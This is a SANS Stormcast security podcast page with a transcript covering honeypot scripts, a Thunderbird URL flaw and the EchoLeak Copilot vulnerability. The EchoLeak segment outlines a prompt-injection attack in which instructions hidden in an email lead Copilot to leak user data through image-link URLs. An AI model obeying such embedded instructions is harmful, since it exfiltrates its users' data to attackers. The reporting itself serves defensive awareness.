Podcast Detail

SANS Stormcast Friday, June 13th, 2025: Honeypot Scripts; EchoLeak MSFT Copilot Vuln; Thunderbolt mailbox URL Vuln;

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9492.mp3

previous
Podcast Logo
Honeypot Scripts; EchoLeak MSFT Copilot Vuln; Thunderbolt mailbox URL Vuln;
00:00

Automated Tools to Assist with DShield Honeypot Investigations
https://isc.sans.edu/diary/Automated%20Tools%20to%20Assist%20with%20DShield%20Honeypot%20Investigations%20%5BGuest%20Diary%5D/32038

EchoLeak: Zero-Click Microsoft 365 Copilot Data Leak
Microsoft fixed a vulnerability in Copilot that could have been abused to exfiltrate data from Copilot users. Copilot mishandled instructions an attacker included in documents inspected by Copilot and executed them.
https://www.aim.security/lp/aim-labs-echoleak-blogpost

Thunderbolt Vulnerability
Thunderbolt users may be tricked into downloading arbitrary files if an email includes a mailbox:/// URL.
https://www.mozilla.org/en-US/security/advisories/mfsa2025-49/


Podcast Transcript

 Hello and welcome to the Friday, June 13th, 2025
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich, and this episode brought to you by
 the SANS.edu Undergraduate Certificate Program in
 Cybersecurity Fundamentals is recorded in Jacksonville,
 Florida. Well, in diaries today we have yet another
 diary by one of our undercredit interns. This time
 William Constantino is looking into scripts that he wrote in
 order to summarize data from the DShield honeypot. Of
 course, we have shown scripts like this before, and when
 you're looking at the diary, I don't want you to look at it
 with sort of the lens where you say, hey, how am I using
 this script for myself? I think what's sometimes more
 useful is to look at it, how could I create a script like
 this, and which ideas from William's script may actually
 apply to my particular use case. So look at what kind of
 data William extracted from the honeypot here. Is this
 useful to you or not? And then also how some of the details
 were implemented in these scripts, and that's, I think,
 a better way to look at it. Creating these scripts
 yourself sometimes has a real great sort of educational
 value, not just with respect to learning how to script, but
 also sifting through data yourself, looking at some of
 the oddities in the data and such. You're really becoming
 way more familiar with the data as a result, and as a
 result also better in actually extracting useful artifacts
 from these logs.
 So the way the attack works is that an attacker starts out by
 sending an email. That email now basically includes a
 command that it wants the copilot to execute. Now it's
 not directly addressed at the copilot. It's addressed at the
 user. But that's again sort of where copilot gets confused,
 and that's where the real sort of issue happens, where now an
 attacker is able to basically control copilot. Now the next
 part is then all about trying to exfiltrate the data, and
 that's done by actually inserting image links into the
 response. And part of the URL is then the data that's being
 exfiltrated. That also basically then requires taking
 advantage of a couple other weaknesses in how these links
 are created and constrained. Interesting vulnerability, and
 yes, this particular issue has been fixed by Microsoft. But
 overall, of course, this is more sort of one of those
 fundamental problems that probably exists in many
 similar systems. And we've got an interesting vulnerability
 in Thunderbird. It's not the most critical vulnerability. I
 think they actually only rated as medium, but I think it sort
 of also follows good follow-up to yesterday's vulnerability
 in KDE with Telnet links. This time it's mailbox links. So
 links starting with mailbox colon and then three slashes.
 Triggers apparently an unsolicited download of
 whatever document is then being listed after this
 mailbox colon protocol indicator. And that can, first
 of all, be abused to basically just load a malicious PDF to
 the user's desktop. It can also be used to trick the
 system then to reach out via SMB, which then gets us back
 to the usual credential leakage. So a bunch of
 different options here available. And something that
 I don't quite think that medium quite covers it really
 well. This is something where, again, the creativity of the
 attacker will have a large part in how this may
 potentially be exploited. And certainly don't forget to
 update Thunderbird if you're using it as your email client.
 Well, and that's it for today. So thanks for listening.
 Thanks for any feedback that you have. Please email or send
 me via other means. And thanks for any good reviews that
 you'll leave in your favorite podcast platform. Next week, I
 will not have a podcast on Wednesday and Thursday due to
 some personal travel. But Monday, Tuesday, Friday should
 just work as usual. So talk to you again on Monday. Bye.